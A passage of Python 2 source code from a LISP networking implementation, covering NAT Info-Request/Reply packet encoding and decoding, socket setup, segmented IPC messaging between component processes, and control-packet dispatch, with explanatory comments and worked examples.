self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information follows the EID-prefix, which has
# EID-prefix-AFI set to 0. What is appended below is either a hostname
# (AFI=17) or nothing (AFI=0):
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | <hostname--null-terminated> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
# Zero out key-id, auth-data-len, ttl, reserved, eid-mask-len, and
# eid-prefix-afi.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17.
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
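#
# A hedged, comment-only sketch of what lisp_info().encode() above produces
# for an Info-Request, assuming the hypothetical hostname "xtr1":
#
#   4 bytes   first-long 0x70000000 (Type=7 per the diagram above; an
#             Info-Reply also sets bit 27, giving 0x78000000)
#   8 bytes   nonce
#   12 bytes  zeroed key-id/auth-len, TTL, and reserved/mask-len/EID-AFI=0
#   2 bytes   AFI=17 (LISP_AFI_NAME)
#   5 bytes   "xtr1" plus a null terminator
#
# for a total of 31 bytes. An Info-Reply instead appends the Type 7 NAT LCAF
# shown in the packet diagram above the class.
#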
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword, byte-swap it when running on x86, and convert it to an
# ASCII hex string, zero-filling any longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
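#
# Illustrative only (nothing here executes): a hedged sketch of the zero-fill
# behavior above for SHA-1-96, ignoring the x86 byte-swap step and assuming
# lisp_hex_string() returns the bare hex digits:
#
#   lisp_concat_auth_data(LISP_SHA_1_96_ALG_ID, 0x1, 0x2, 0x3, "")
#     -> "0000000000000001" + "0000000000000002" + "00000003"
#     -> a 40-hex-digit (160-bit) authentication string
#
# SHA-256-128 concatenates four 16-hex-digit longwords for 64 hex digits.
#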
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
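#
# For illustration only (not executed), typical calls to the routine above.
# The addresses and socket names are examples, not a statement of what
# callers actually pass:
#
#   lisp_open_listen_socket("0.0.0.0", "4342")  -> IPv4 UDP socket on 4342
#   lisp_open_listen_socket("0::0", "4342")     -> IPv6 UDP socket on 4342
#                                                  (returns None on Raspbian)
#   lisp_open_listen_socket("", "lisp-itr")     -> AF_UNIX datagram socket
#                                                  bound to file "lisp-itr"
#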
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#enddef
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be sourced from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have the same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for an API message. Note this API IPC message must
# have the same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
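#
# Illustrative only (nothing here executes): the IPC strings the builders
# above produce, shown with placeholder sources, addresses, and payloads:
#
#   lisp_packet_ipc(pkt, "lisp-itr", 4342)
#     -> "packet@<len(pkt)>@lisp-itr@4342@<pkt>"
#   lisp_control_packet_ipc(pkt, "lisp-mr", "10.0.0.1", 4342)
#     -> "control-packet@10.0.0.1@4342@<pkt>"
#   lisp_data_packet_ipc(pkt, "lisp-itr")
#     -> "data-packet@<len(pkt)>@lisp-itr@@<pkt>"
#   lisp_command_ipc(cmd, "lisp-core")
#     -> "command@<len(cmd)>@lisp-core@@<cmd>"
#   lisp_api_ipc("lisp-core", data)
#     -> "api@<len(data)>@lisp-core@@<data>"
#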
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in segments (1500 or 9000 bytes, see below) since the socket
# interface will not accept larger datagrams, and socket.setsockopt() won't
# allow us to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
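#
# Illustrative only (nothing here executes): with the segment sizes used
# above, a 4000-byte "command@..." IPC message goes out as three sendto()
# calls of 1500, 1500, and 1000 bytes; a "control-packet@..." message would
# use 9000-byte segments instead. On a socket error a segment is retried with
# an exponential backoff starting at 1 ms, and the peer is declared down
# after 12 consecutive failures.
#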
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + " "
offset += 8
length -= 4
#endwhile
return(new)
#enddef
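#
# A hedged example (comment only) of the formatting above:
#
#   lisp_format_packet("\x45\x00\x00\x14\xab\xcd")
#     -> "45000014 abcd "
#
# i.e. the hex dump is grouped 4 bytes (8 hex digits) at a time with a space
# after each group.
#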
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0].
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 128)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Receive and reassemble the remaining segments when the received IPC message
# is larger than a single socket read can return.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length. We only have one
# segment which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, so the
# last partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@") between them. This is a
# bit-stuffing procedure. Only look at array elements with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
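#
# Illustrative only (nothing here executes): a sketch of how the bit-stuffing
# above restores "@" bytes that the IPC split() removed from the payload:
#
#   "command@5@lisp-itr@@ab@cd".split("@")
#     -> ["command", "5", "lisp-itr", "", "ab", "cd"]
#   lisp_bit_stuff(["ab", "cd"])
#     -> "ab@cd"
#
# which matches the advertised total-length of 5 bytes.
#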
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did it so it is assembled into a complete datagram
# in this system.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we could confuse the IPC separator with real data.
# So go to the payload and put 0x40 back where split() separated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
timestamp = time.time()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl, timestamp)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl, timestamp):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
